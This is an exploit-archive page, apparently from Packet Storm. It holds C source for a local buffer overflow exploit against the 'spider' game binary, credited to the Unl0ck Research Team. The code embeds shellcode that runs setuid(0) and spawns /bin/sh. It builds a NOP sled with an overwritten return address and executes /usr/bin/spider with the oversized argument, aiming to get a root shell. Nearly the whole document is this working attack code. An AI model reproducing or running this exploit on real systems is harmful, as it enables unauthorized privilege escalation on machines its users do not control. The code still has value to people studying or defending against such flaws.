Spider game local buffer overflow exploit.
e3cc4d7d111162ecb945ae14b0176162973648ebee57c23965c8b7c11d36145f/*
Spider Game Local Buffer Overflow Exploit
by Dark Eagle
Unl0ck Research Team
http://unl0ck.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define BIN "/usr/bin/spider"
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
long getsp()
{
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[])
{
long RET;
int i, off;
char buf[2000];
char *p;
if ( argc == 2 ) { off=atoi(argv[1]); }
RET = getsp()+off;
printf("Local Game Exploit For Spider game\nby Unl0ck Team http://unl0ck.info\np.s. Dark Eagle\n");
p = buf;
memset(buf, 0x90, 2000-1-strlen(shellcode));
sprintf(buf+2000-1-strlen(shellcode), "%s", shellcode);
printf("using RETADDR = 0x%x and OFFSET = %d\n", RET, off);
for ( i = 1035; i <= 1039; i += 4 )
*(long*)(p+i) = RET;
execl("/usr/bin/spider", BIN, "-s", buf, NULL);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed